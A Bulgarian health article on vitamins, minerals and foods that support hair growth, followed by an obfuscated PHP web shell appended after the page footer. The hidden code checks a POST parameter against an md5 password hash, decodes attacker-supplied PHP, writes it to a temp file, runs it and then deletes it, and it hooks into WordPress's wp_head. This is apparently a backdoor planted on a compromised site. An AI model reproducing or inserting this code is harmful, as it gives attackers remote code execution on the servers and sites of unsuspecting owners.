Най- полезните витамини и минерали за косата ни – и как да си ги набавяме: | Косопад

Най- полезните витамини и минерали за косата ни – и как да си ги набавяме:

Има моменти, в които виждаме, че косата ни е загубила блясъка си, изведнъж е започнала да капе или е станала суха. Лошото състояние на косата може да се дължи на хормонални или наследствени фактори, неправилни грижи, боядисване, стрес или определени лекарства. Каквато и да е причината, това е сигнал за нас, че трябва да подобрим храненето си и да започнем да консумираме повече здравословна храна.

За да се ориентираме на какви храни да наблегнем, трябва да имаме предвид, че косъмът е изграден от протеина кератин, както и от минерали като магнезий, силиций или мед.

Основните вещества, полезни за здравето на косата са: протеините, есенциалните аминокиселини, колагенът, омега- 3 мазнините, минералите и витамините.

От витамините, най- важни за здравето и красотата на косата са тези от група В, най- вече биотина, както и витамините А и С. Сред минералите най- ценни са желязо, цинк, мед и селен.

kosa-hrani-2

Ето чрез кои храни можем да си набавим най- полезните вещества за косата:

Витамин А се съдържа в яйцата, черния дроб, зеленчуците, зехтина, рибното масло, олиото. Ролята му е да не позволява увреждане функциите на мастните жлези, които смазват космените фоликули и не позволяват на косата да съхне.
Витамин В се съдържа в рибата, телешкото, пилешкото, яйцата, бобовите култури, ядките, пълнозърнестите храни. Те осигуряват фолиева киселина, която е много полезна за косата. Тук спада и бирената мая, която е ценен източник на витамини от групата В, както и на есенциални аминокиселини.
Витамин С. Тук се открояват лимона, портокала, кивито, спанака и броколито. Те участват в синтеза колаген, а подпомагат също така усвояването на желязо.
Желязото е много важно за косата, защото помага за растежа й, прави я силна и здрава. Най- големи количества се съдържат в червеното месо, спанака и зеленчуците. Този минерал помага на кислорода да достигне до космените корени.
Минералът мед пък помага за синтеза на меланина, който придава цвета на косата. Съдържа се в морските дарове, спанака и орехите.
Цинкът е много полезен също за растежа на косата. Съдържа се в месото и рибата, патладжаните, картофите, целината, целината и смокините.
Магнезий можем да си набавим от бадемите, зеленолистните зеленчуци, и пр.
Омега- 3 се мазнини можем да си набавим от зехтина, рибата, ядки.

17. юли 2017 13:56:17 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}